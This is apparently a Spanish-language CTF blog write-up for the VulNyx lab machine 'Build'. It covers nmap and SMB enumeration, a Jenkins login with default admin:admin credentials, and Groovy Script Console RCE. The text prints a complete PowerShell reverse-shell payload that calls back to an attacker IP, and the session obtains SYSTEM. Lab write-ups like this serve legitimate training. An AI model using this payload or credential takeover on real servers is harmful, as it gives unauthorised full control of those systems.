cd ~/blog

~/writeups/vulnyx/35-build.md

35 - Build

low Windows vulnyx 09-11-2025
Jenkins default credentialsJenkins Script Console RCE (Groovy)
vulnyx.com

~1 min de lectura


Identificamos la IP de la máquina víctima:

 arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.207.245.174

Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.207.245.174
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-09 00:27 -0300
Nmap scan report for 10.207.245.174
Host is up (0.00021s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
7680/tcp  open  pando-pub
8080/tcp  open  http-proxy
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
MAC Address: 08:00:27:EB:D8:BC (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.12 seconds
 nmap -sCV -p 80,135,139,445,5040,7680,8080,49664,49665,49666,49667,49668,49669,49670 -oN 02-targeted.txt 10.207.245.174
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-09 01:12 -0300
Nmap scan report for 10.207.245.174
Host is up (0.00077s latency).

PORT      STATE  SERVICE       VERSION
80/tcp    open   http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?
5040/tcp  open   unknown
7680/tcp  closed pando-pub
8080/tcp  open   http          Jetty 12.0.19
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(12.0.19)
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp open   msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: BUILD, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:eb:d8:bc (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-11-09T08:15:36
|_  start_date: N/A
|_clock-skew: 3h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.74 seconds

Enumeramos el puerto 445, pero la sesión nula no nos permite listar recursos:

 netexec smb 10.207.245.174
SMB         10.207.245.174  445    BUILD            [*] Windows 10 / Server 2019 Build 19041 x64 (name:BUILD) (domain:BUILD) (signing:False) (SMBv1:None)

 netexec smb 10.207.245.174 -u '' -p '' --shares
SMB         10.207.245.174  445    BUILD            [*] Windows 10 / Server 2019 Build 19041 x64 (name:BUILD) (domain:BUILD) (signing:False) (SMBv1:None)
SMB         10.207.245.174  445    BUILD            [-] BUILD\: STATUS_ACCESS_DENIED
SMB         10.207.245.174  445    BUILD            [-] Error enumerating shares: Error occurs while reading from remote(104)

El servicio Jetty del puerto 8080 resulta ser Jenkins. Accedemos a http://10.207.245.174:8080 y nos logueamos con las credenciales por defecto admin:admin.

En http://10.207.245.174:8080/manage/ encontramos la Consola de scripts (/manage/script), que permite ejecutar scripts Groovy (Jenkins Script Console RCE). Probamos la ejecución de comandos:

def comando = "cmd /c whoami"
def proceso = comando.execute()
proceso.waitFor()
println proceso.text

Salida: nt authority\system

Confirmamos que Jenkins corre como nt authority\system. Lanzamos una reverse shell de PowerShell:

def comando = 'powershell -NoP -NonI -W Hidden -Command "$client = New-Object System.Net.Sockets.TCPClient(\'10.207.245.35\',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"'

def process = comando.execute()
process.waitFor()
println "pwned!"

❯ ncat -nlvp 1234
Ncat: Version 7.98 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.207.245.174:60070.
PS C:\Program Files\Jenkins> whoami
nt authority\system

Obtenemos una shell y las flags.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados